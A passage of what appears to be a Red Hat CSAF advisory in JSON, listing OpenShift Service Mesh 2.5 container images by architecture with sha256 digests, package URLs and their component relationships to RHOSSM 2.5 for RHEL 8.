"purl": "pkg:oci/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
